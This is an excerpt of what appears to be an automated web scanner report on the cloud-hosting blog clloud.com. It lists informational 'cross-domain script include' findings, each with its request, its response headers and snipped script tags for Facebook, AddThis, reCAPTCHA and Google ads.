<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username="></script>
...[SNIP]...

3.4. http://clloud.com/clloud-com-news/gigenet-cloud-servers-reviewed/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /clloud-com-news/gigenet-cloud-servers-reviewed/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /clloud-com-news/gigenet-cloud-servers-reviewed/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:45:27 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Link: <http://clloud.com/?p=286>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29042

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username="></script>
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdfygsAAAAAAAGP_VnP-WFQOTv2S8d31wmtMFVB"></script>
...[SNIP]...

3.5. http://clloud.com/clloud-com-news/we-test-drive-the-rackspace-cloud-iphone-app/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /clloud-com-news/we-test-drive-the-rackspace-cloud-iphone-app/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /clloud-com-news/we-test-drive-the-rackspace-cloud-iphone-app/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:45:39 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Link: <http://clloud.com/?p=152>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username="></script>
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdfygsAAAAAAAGP_VnP-WFQOTv2S8d31wmtMFVB"></script>
...[SNIP]...

3.6. http://clloud.com/cloud-files-news/new-rackspace-cloud-control-panel-coming-soon/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /cloud-files-news/new-rackspace-cloud-control-panel-coming-soon/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cloud-files-news/new-rackspace-cloud-control-panel-coming-soon/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:47:45 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Link: <http://clloud.com/?p=177>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username="></script>
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdfygsAAAAAAAGP_VnP-WFQOTv2S8d31wmtMFVB"></script>
...[SNIP]...

3.7. http://clloud.com/cloud-files-news/sites-using-cdn-file-clouds/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /cloud-files-news/sites-using-cdn-file-clouds/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cloud-files-news/sites-using-cdn-file-clouds/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:47:34 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Link: <http://clloud.com/?p=227>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...
</p>
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdfygsAAAAAAAGP_VnP-WFQOTv2S8d31wmtMFVB"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username="></script>
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdfygsAAAAAAAGP_VnP-WFQOTv2S8d31wmtMFVB"></script>
...[SNIP]...

3.8. http://clloud.com/cloud-server-news/get-30-off-at-vps-net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /cloud-server-news/get-30-off-at-vps-net/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cloud-server-news/get-30-off-at-vps-net/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:45:50 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Link: <http://clloud.com/?p=258>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username="></script>
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdfygsAAAAAAAGP_VnP-WFQOTv2S8d31wmtMFVB"></script>
...[SNIP]...

3.9. http://clloud.com/cloud-server-news/vps-net-now-offers-offsite-daily-rsync-backups/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /cloud-server-news/vps-net-now-offers-offsite-daily-rsync-backups/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cloud-server-news/vps-net-now-offers-offsite-daily-rsync-backups/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:45:54 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Link: <http://clloud.com/?p=181>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username="></script>
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdfygsAAAAAAAGP_VnP-WFQOTv2S8d31wmtMFVB"></script>
...[SNIP]...

3.10. http://clloud.com/cloud-server-news/vps-net-to-offer-windows-cloud-servers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /cloud-server-news/vps-net-to-offer-windows-cloud-servers/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cloud-server-news/vps-net-to-offer-windows-cloud-servers/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:45:44 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Link: <http://clloud.com/?p=268>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username="></script>
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdfygsAAAAAAAGP_VnP-WFQOTv2S8d31wmtMFVB"></script>
...[SNIP]...

3.11. http://clloud.com/cloud-server-reviews/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /cloud-server-reviews/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cloud-server-reviews/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:45:18 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username="></script>
...[SNIP]...

3.12. http://clloud.com/cloud-server-reviews/gigenet-cloud-servers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /cloud-server-reviews/gigenet-cloud-servers/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cloud-server-reviews/gigenet-cloud-servers/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:45:19 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32295

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username="></script>
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdfygsAAAAAAAGP_VnP-WFQOTv2S8d31wmtMFVB"></script>
...[SNIP]...

3.13. http://clloud.com/cloud-server-reviews/vps-net-cloud-servers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /cloud-server-reviews/vps-net-cloud-servers/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cloud-server-reviews/vps-net-cloud-servers/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:45:18 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username="></script>
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdfygsAAAAAAAGP_VnP-WFQOTv2S8d31wmtMFVB"></script>
...[SNIP]...

3.14. http://clloud.com/feed/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /feed/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /feed/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:45:12 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
ETag: "b39fa4e273d59683550769edadaa2370"
Last-Modified: Tue, 02 Nov 2010 07:14:11 GMT
Connection: close
Content-Type: text/xml; charset=UTF-8
Content-Length: 34867

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
   xmlns:content="http://purl.org/rss/1.0/modules/content/"
   xmlns:wfw="http://wellformedweb.org/CommentAPI/"
   xmlns:dc="http://purl.org/dc/elem
...[SNIP]...
</p>
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdfygsAAAAAAAGP_VnP-WFQOTv2S8d31wmtMFVB"></script>
...[SNIP]...

3.15. http://clloud.com/general-cloud-news/microsoft-staking-its-future-on-cloud-computing/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /general-cloud-news/microsoft-staking-its-future-on-cloud-computing/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /general-cloud-news/microsoft-staking-its-future-on-cloud-computing/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:46:57 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Link: <http://clloud.com/?p=148>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32089

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username="></script>
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdfygsAAAAAAAGP_VnP-WFQOTv2S8d31wmtMFVB"></script>
...[SNIP]...

3.16. http://clloud.com/general-cloud-news/send-vps-net-a-postcard-and-win-an-ipad/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /general-cloud-news/send-vps-net-a-postcard-and-win-an-ipad/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /general-cloud-news/send-vps-net-a-postcard-and-win-an-ipad/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:46:29 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Link: <http://clloud.com/?p=262>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username="></script>
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdfygsAAAAAAAGP_VnP-WFQOTv2S8d31wmtMFVB"></script>
...[SNIP]...

3.17. http://clloud.com/reviews/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /reviews/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /reviews/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; fbsetting_dede1b193bdee860c80cdc6ff6fbfdb2=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; base_domain_dede1b193bdee860c80cdc6ff6fbfdb2=clloud.com; __utmc=129154910; __utmb=129154910.1.10.1293553097;

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:45:16 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
...[SNIP]...
<br />
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username="></script>
...[SNIP]...

3.18. http://clloud.com/reviews/amazon-storage-cloud-amazon-s3/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /reviews/amazon-storage-cloud-amazon-s3/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /reviews/amazon-storage-cloud-amazon-s3/ HTTP/1.1
Host: clloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
